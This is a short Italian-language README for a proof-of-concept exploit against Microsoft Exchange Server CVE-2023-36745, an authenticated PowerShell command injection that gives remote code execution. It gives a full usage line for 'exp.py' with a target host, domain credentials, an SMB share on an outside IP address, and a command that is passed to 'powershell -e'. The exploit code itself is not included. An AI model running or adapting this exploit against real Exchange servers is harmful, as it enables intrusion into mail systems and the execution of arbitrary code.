
Proof-of-concept exploit per la vulnerabilità RCE di Microsoft Exchange Server CVE-2023-36745, che consente l'esecuzione remota del codice tramite iniezione di comandi PowerShell autenticata.
PoC RCE per Microsoft Exchange Server CVE-2023-36745.
Esempio:
python3 exp.py -H exchange.webdxg.com -u webdxg.com\dddai -p 4IDF7LAU -s \\192.168.237.131\Shares\ -c calc.exe
Il comando verrà passato a powershell -e.